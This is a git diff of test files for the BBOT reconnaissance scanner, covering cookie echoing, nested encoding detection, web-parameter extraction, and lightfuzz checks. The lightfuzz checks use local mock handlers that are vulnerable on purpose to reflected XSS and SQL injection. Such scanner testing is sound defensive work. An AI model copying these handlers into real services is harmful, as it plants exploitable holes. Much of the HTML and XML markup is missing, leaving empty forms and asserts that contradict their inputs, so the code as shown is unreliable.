test_web_cookies(bbot_scanner, httpx_mock): assert not client2.cookies await scan._cleanup() + + +@pytest.mark.asyncio +async def test_http_sendcookies(bbot_scanner, bbot_httpserver): + endpoint = "/" + url = bbot_httpserver.url_for(endpoint) + from werkzeug.wrappers import Response + + def echo_cookies_handler(request): + cookies = request.cookies + cookie_str = "; ".join([f"{key}={value}" for key, value in cookies.items()]) + return Response(f"Echoed Cookies: {cookie_str}\nEchoed Headers: {request.headers}") + + bbot_httpserver.expect_request(uri=endpoint).respond_with_handler(echo_cookies_handler) + scan1 = bbot_scanner("127.0.0.1", config={"web": {"debug": True}}) + r1 = await scan1.helpers.request(url, cookies={"foo": "bar"}) + print(r1.text) + + assert r1 is not None, "Request to self-signed SSL server went through even with ssl_verify=True" + assert "bar" in r1.text + await scan1._cleanup() diff --git a/bbot/test/test_step_1/test_web_envelopes.py b/bbot/test/test_step_1/test_web_envelopes.py new file mode 100644 index 0000000000..79da9e829e --- /dev/null +++ b/bbot/test/test_step_1/test_web_envelopes.py @@ -0,0 +1,339 @@ +import pytest + + +async def test_web_envelopes(): + from bbot.core.helpers.web.envelopes import ( + BaseEnvelope, + TextEnvelope, + HexEnvelope, + B64Envelope, + JSONEnvelope, + XMLEnvelope, + URLEnvelope, + ) + + # simple text + text_envelope = BaseEnvelope.detect("foo") + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.unpacked_data() == "foo" + assert text_envelope.subparams == {"__default__": "foo"} + expected_subparams = [([], "foo")] + assert list(text_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert text_envelope.get_subparam(subparam) == value + assert text_envelope.pack() == "foo" + assert text_envelope.num_envelopes == 0 + assert text_envelope.get_subparam() == "foo" + text_envelope.set_subparam(value="bar") + assert text_envelope.get_subparam() == "bar" + assert text_envelope.unpacked_data() == "bar" + + # simple binary + # binary_envelope = BaseEnvelope.detect("foo\x00") + # assert isinstance(binary_envelope, BinaryEnvelope) + # assert binary_envelope.unpacked_data == "foo\x00" + # assert binary_envelope.packed_data == "foo\x00" + # assert binary_envelope.subparams == {"__default__": "foo\x00"} + + # text encoded as hex + hex_envelope = BaseEnvelope.detect("706172616d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.unpacked_data(recursive=True) == "param" + hex_inner_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(hex_inner_envelope, TextEnvelope) + assert hex_inner_envelope.unpacked_data(recursive=False) == "param" + assert hex_inner_envelope.unpacked_data(recursive=True) == "param" + assert list(hex_envelope.get_subparams(recursive=False)) == [([], hex_inner_envelope)] + assert list(hex_envelope.get_subparams(recursive=True)) == [([], "param")] + assert hex_inner_envelope.unpacked_data() == "param" + assert hex_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(hex_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_inner_envelope.get_subparam(subparam) == value + assert hex_envelope.pack() == "706172616d" + assert hex_envelope.num_envelopes == 1 + assert hex_envelope.get_subparam() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert hex_envelope.pack() == "61736466" + + # text encoded as base64 + base64_envelope = BaseEnvelope.detect("cGFyYW0=") + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.unpacked_data() == "param" + base64_inner_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, TextEnvelope) + assert list(base64_envelope.get_subparams(recursive=False)) == [([], base64_inner_envelope)] + assert list(base64_envelope.get_subparams()) == [([], "param")] + assert base64_inner_envelope.pack() == "param" + assert base64_inner_envelope.unpacked_data() == "param" + assert base64_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(base64_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_inner_envelope.get_subparam(subparam) == value + assert base64_envelope.num_envelopes == 1 + base64_envelope.set_subparam(value="asdf") + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + assert base64_envelope.pack() == "YXNkZg==" + + # test inside hex inside base64 + hex_envelope = BaseEnvelope.detect("634746795957303d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.get_subparam() == "param" + assert hex_envelope.unpacked_data() == "param" + base64_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.get_subparam() == "param" + assert base64_envelope.unpacked_data() == "param" + text_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.get_subparam() == "param" + assert text_envelope.unpacked_data() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert text_envelope.get_subparam() == "asdf" + assert text_envelope.unpacked_data() == "asdf" + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + + # URL-encoded text + url_encoded_envelope = BaseEnvelope.detect("a%20b%20c") + assert isinstance(url_encoded_envelope, URLEnvelope) + assert url_encoded_envelope.pack() == "a%20b%20c" + assert url_encoded_envelope.unpacked_data() == "a b c" + url_inner_envelope = url_encoded_envelope.unpacked_data(recursive=False) + assert isinstance(url_inner_envelope, TextEnvelope) + assert url_inner_envelope.unpacked_data(recursive=False) == "a b c" + assert url_inner_envelope.unpacked_data(recursive=True) == "a b c" + assert list(url_encoded_envelope.get_subparams(recursive=False)) == [([], url_inner_envelope)] + assert list(url_encoded_envelope.get_subparams(recursive=True)) == [([], "a b c")] + assert url_inner_envelope.pack() == "a b c" + assert url_inner_envelope.unpacked_data() == "a b c" + assert url_inner_envelope.subparams == {"__default__": "a b c"} + expected_subparams = [([], "a b c")] + assert list(url_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert url_inner_envelope.get_subparam(subparam) == value + assert url_encoded_envelope.num_envelopes == 1 + url_encoded_envelope.set_subparam(value="a s d f") + assert url_encoded_envelope.get_subparam() == "a s d f" + assert url_encoded_envelope.unpacked_data() == "a s d f" + assert url_encoded_envelope.pack() == "a%20s%20d%20f" + + # json + json_envelope = BaseEnvelope.detect('{"param1": "val1", "param2": {"param3": "val3"}}') + assert isinstance(json_envelope, JSONEnvelope) + assert json_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=False) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=True) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert json_envelope.get_subparam(subparam) == value + json_envelope.selected_subparam = ["param2", "param3"] + assert json_envelope.get_subparam() == "val3" + assert json_envelope.num_envelopes == 1 + + # xml + xml_envelope = BaseEnvelope.detect( + 'val1val3' + ) + assert isinstance(xml_envelope, XMLEnvelope) + assert ( + xml_envelope.pack() + == '\nval1val3' + ) + assert xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=False) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=True) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.subparams == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "attr1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert xml_envelope.get_subparam(subparam) == value + assert xml_envelope.num_envelopes == 1 + + # json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + assert isinstance(base64_json_envelope, B64Envelope) + assert base64_json_envelope.pack() == "eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19" + assert base64_json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + base64_inner_envelope = base64_json_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, JSONEnvelope) + assert base64_inner_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert base64_inner_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert base64_inner_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + assert base64_json_envelope.num_envelopes == 2 + with pytest.raises(ValueError): + assert base64_json_envelope.get_subparam() + base64_json_envelope.selected_subparam = ["param2", "param3"] + assert base64_json_envelope.get_subparam() == "val3" + + # xml inside url inside hex inside base64 + nested_xml_envelope = BaseEnvelope.detect( + "MjUzMzYzMjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMjMwMjUzNjMxMjUzNzM0MjUzNzM0MjUzNzMyMjUzMzY0MjUzMjMyMjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMjMyMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMzMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1" + ) + assert isinstance(nested_xml_envelope, B64Envelope) + assert nested_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert ( + nested_xml_envelope.pack() + == "MjUzMzQzMjUzMzQ2Nzg2ZDZjMjUzMjMwNzY2NTcyNzM2OTZmNmUyNTMzNDQyNTMyMzIzMTJlMzAyNTMyMzIyNTMyMzA2NTZlNjM2ZjY0Njk2ZTY3MjUzMzQ0MjUzMjMyNzU3NDY2MmQzODI1MzIzMjI1MzM0NjI1MzM0NTI1MzA0MTI1MzM0MzcyNmY2Zjc0MjUzMzQ1MjUzMzQzNzA2MTcyNjE2ZDMxMjUzMjMwNjE3NDc0NzIyNTMzNDQyNTMyMzI3NjYxNmMzMTI1MzIzMjI1MzM0NTc2NjE2YzMxMjUzMzQzMmY3MDYxNzI2MTZkMzEyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzMyNTMzNDU3NjYxNmMzMzI1MzM0MzJmNzA2MTcyNjE2ZDMzMjUzMzQ1MjUzMzQzMmY3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDMyZjcyNmY2Zjc0MjUzMzQ1" + ) + inner_hex_envelope = nested_xml_envelope.unpacked_data(recursive=False) + assert isinstance(inner_hex_envelope, HexEnvelope) + assert ( + inner_hex_envelope.pack() + == "253343253346786d6c25323076657273696f6e253344253232312e30253232253230656e636f64696e672533442532327574662d38253232253346253345253041253343726f6f74253345253343706172616d312532306174747225334425323276616c3125323225334576616c312533432f706172616d31253345253343706172616d32253345253343706172616d3325334576616c332533432f706172616d332533452533432f706172616d322533452533432f726f6f74253345" + ) + inner_url_envelope = inner_hex_envelope.unpacked_data(recursive=False) + assert isinstance(inner_url_envelope, URLEnvelope) + assert ( + inner_url_envelope.pack() + == r"%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Croot%3E%3Cparam1%20attr%3D%22val1%22%3Eval1%3C/param1%3E%3Cparam2%3E%3Cparam3%3Eval3%3C/param3%3E%3C/param2%3E%3C/root%3E" + ) + inner_xml_envelope = inner_url_envelope.unpacked_data(recursive=False) + assert isinstance(inner_xml_envelope, XMLEnvelope) + assert ( + inner_xml_envelope.pack() + == '\nval1val3' + ) + assert inner_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert inner_xml_envelope.subparams == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(nested_xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert nested_xml_envelope.get_subparam(subparam) == value + assert nested_xml_envelope.num_envelopes == 4 + + # manipulating text inside hex + hex_envelope = BaseEnvelope.detect("706172616d") + expected_subparams = [([], "param")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + hex_envelope.set_subparam([], "asdf") + expected_subparams = [([], "asdf")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + assert hex_envelope.unpacked_data() == "asdf" + + # manipulating json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param1"], {"asdf": [None], "fdsa": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3", "1234"], [None]), + (["param2", "param3", "4321"], 1.0), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + base64_json_envelope.set_subparam(["param2"], None) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2"], None), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + + # xml inside url inside base64 + xml_envelope = BaseEnvelope.detect( + "JTNDP3htbCUyMHZlcnNpb249JTIyMS4wJTIyJTIwZW5jb2Rpbmc9JTIydXRmLTglMjI/JTNFJTBBJTNDcm9vdCUzRSUzQ3BhcmFtMSUyMGF0dHI9JTIydmFsMSUyMiUzRXZhbDElM0MvcGFyYW0xJTNFJTNDcGFyYW0yJTNFJTNDcGFyYW0zJTNFdmFsMyUzQy9wYXJhbTMlM0UlM0MvcGFyYW0yJTNFJTNDL3Jvb3QlM0U=" + ) + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMnZhbDElMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + xml_envelope.set_subparam(["root", "param1", "@attr"], "asdf") + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMmFzZGYlMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + xml_envelope.set_subparam(["root", "param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3", "1234"], [None]), + (["root", "param2", "param3", "4321"], 1.0), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + + # null + null_envelope = BaseEnvelope.detect("null") + assert isinstance(null_envelope, JSONEnvelope) + assert null_envelope.unpacked_data() is None + assert null_envelope.pack() == "null" + expected_subparams = [([], None)] + assert list(null_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert null_envelope.get_subparam(subparam) == value + + tiny_base64 = BaseEnvelope.detect("YWJi") + assert isinstance(tiny_base64, TextEnvelope) diff --git a/bbot/test/test_step_2/module_tests/test_module_excavate.py b/bbot/test/test_step_2/module_tests/test_module_excavate.py index e4e9c907c9..76975b69f2 100644 --- a/bbot/test/test_step_2/module_tests/test_module_excavate.py +++ b/bbot/test/test_step_2/module_tests/test_module_excavate.py @@ -133,7 +133,7 @@ async def setup_before_prep(self, module_test): def check(self, module_test, events): root_relative_detection = False page_relative_detection_1 = False - page_relative_detection_1 = False + page_relative_detection_2 = False root_page_confusion_1 = False root_page_confusion_2 = False @@ -451,26 +451,36 @@ class TestExcavateParameterExtraction(TestExcavate): $.post("/test", {jquerypost: "value2"}); -

Simple GET Form

Use the form below to submit a GET request:

-

+

Simple POST Form

Use the form below to submit a POST request:

-

+

+ +
+

Simple Generic Form

+

Use the form below to submit a request:

+
+ +

Links

href img - + """ @@ -483,12 +493,15 @@ def check(self, module_test, events): found_jquery_post = False found_form_get = False found_form_post = False + found_form_generic = False found_jquery_get_original_value = False found_jquery_post_original_value = False found_form_get_original_value = False found_form_post_original_value = False + found_form_generic_original_value = False found_htmltags_a = False found_htmltags_img = False + found_select_noquotes = False for e in events: if e.type == "WEB_PARAMETER": @@ -502,16 +515,21 @@ def check(self, module_test, events): if e.data["original_value"] == "value2": found_jquery_post_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (GET Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q1] (GET Form Submodule)": found_form_get = True if e.data["original_value"] == "flowers": found_form_get_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (POST Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q2] (POST Form Submodule)": found_form_post = True if e.data["original_value"] == "boats": found_form_post_original_value = True + if e.data["description"] == "HTTP Extracted Parameter [q3] (Generic Form Submodule)": + found_form_generic = True + if e.data["original_value"] == "candles": + found_form_generic_original_value = True + if e.data["description"] == "HTTP Extracted Parameter [age] (HTML Tags Submodule)": if e.data["original_value"] == "456": if "id" in e.data["additional_params"].keys(): @@ -522,18 +540,100 @@ def check(self, module_test, events): if "fit" in e.data["additional_params"].keys(): found_htmltags_img = True + if ( + e.data["description"] + == "HTTP Extracted Parameter [blog-post-author-display] (POST Form Submodule)" + ): + if e.data["original_value"] == "user.name": + if "csrf" in e.data["additional_params"].keys(): + found_select_noquotes = True + assert found_jquery_get, "Did not extract Jquery GET parameters" assert found_jquery_post, "Did not extract Jquery POST parameters" assert found_form_get, "Did not extract Form GET parameters" assert found_form_post, "Did not extract Form POST parameters" + assert found_form_generic, "Did not extract Form (Generic) parameters" assert found_jquery_get_original_value, "Did not extract Jquery GET parameter original_value" assert found_jquery_post_original_value, "Did not extract Jquery POST parameter original_value" assert found_form_get_original_value, "Did not extract Form GET parameter original_value" assert found_form_post_original_value, "Did not extract Form POST parameter original_value" + assert found_form_generic_original_value, "Did not extract Form (Generic) parameter original_value" assert found_htmltags_a, "Did not extract parameter(s) from a-tag" assert found_htmltags_img, "Did not extract parameter(s) from img-tag" + assert found_select_noquotes, "Did not extract parameter(s) from select-tag" + + +class TestExcavateParameterExtraction_postformnoaction(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_html = """ + +

Post for without action

+
+ + +

+ +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postformnoaction_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [state] (POST Form (no action) Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_additionalparams(ModuleTestBase): + + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_multiparams_html = """ + +

Post for without action

+
+ + + + +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postformnoaction_extract_multiparams_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + + excavate_additionalparam_extraction_param1 = False + excavate_additionalparam_extraction_param2 = False + excavate_additionalparam_extraction_param3 = False + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "template-action" and "csrf" in e.data["additional_params"].keys() and "template" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param1 = True + if e.data["name"] == "template" and "csrf" in e.data["additional_params"].keys() and "template-action" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param2 = True + if e.data["name"] == "csrf" and "template" in e.data["additional_params"].keys() and "template-action" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param3 = True + assert excavate_additionalparam_extraction_param1, "Excavate failed to extract web parameter with correct additional data (param 1)" + assert excavate_additionalparam_extraction_param2, "Excavate failed to extract web parameter with correct additional data (param 2)" + assert excavate_additionalparam_extraction_param3, "Excavate failed to extract web parameter with correct additional data (param 3)" + class TestExcavateParameterExtraction_getparam(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] @@ -556,6 +656,75 @@ def check(self, module_test, events): assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_relativeurl(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + config_overrides = {"web": {"spider_distance": 2, "spider_depth": 3}} + + # Secondary page that has a relative link to a traversal URL + secondary_page_html = """ + + Go to root + + """ + + # Primary page that leads to the secondary page + primary_page_html = """ + + Go to secondary page + + """ + + # Root page content + root_page_html = "Root page" + + async def setup_after_prep(self, module_test): + module_test.httpserver.expect_request("/").respond_with_data(self.primary_page_html) + module_test.httpserver.expect_request("/secondary").respond_with_data(self.secondary_page_html) + module_test.httpserver.expect_request("/root.html").respond_with_data(self.root_page_html) + + def check(self, module_test, events): + # Validate that the traversal was successful and WEB_PARAMETER was extracted + traversed_to_root = False + parameter_extraction_found = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter" in e.data["description"]: + parameter_extraction_found = True + + if e.type == "URL": + if "root.html" in e.parsed_url.path: + traversed_to_root = True + + assert traversed_to_root, "Failed to follow the relative traversal to /root.html" + assert parameter_extraction_found, "Excavate failed to extract parameter after traversal" + + +class TestExcavateParameterExtraction_getparam_novalue(TestExcavateParameterExtraction_getparam): + getparam_extract_html = """ + + """ + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [searchTerm] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + class TestExcavateParameterExtraction_json(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] @@ -610,6 +779,75 @@ def check(self, module_test, events): assert excavate_xml_extraction, "Excavate failed to extract xml parameter" +class TestExcavateParameterExtraction_inputtagnovalue(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + getparam_extract_html = """ +
+ """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [novalue] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_jqueryjsonajax(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "hunt"] + jsonajax_extract_html = """ + + + + +

test

+ + + """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + expect_args = re.compile("/otherpage.php") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] == "en": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (getparam) +class Test_Lightfuzz_sqli(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote getparam FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (postparam) +class Test_Lightfuzz_sqli_post(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + parameter_block = """ + + """ + + if "search" in request.form.keys(): + value = request.form["search"] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
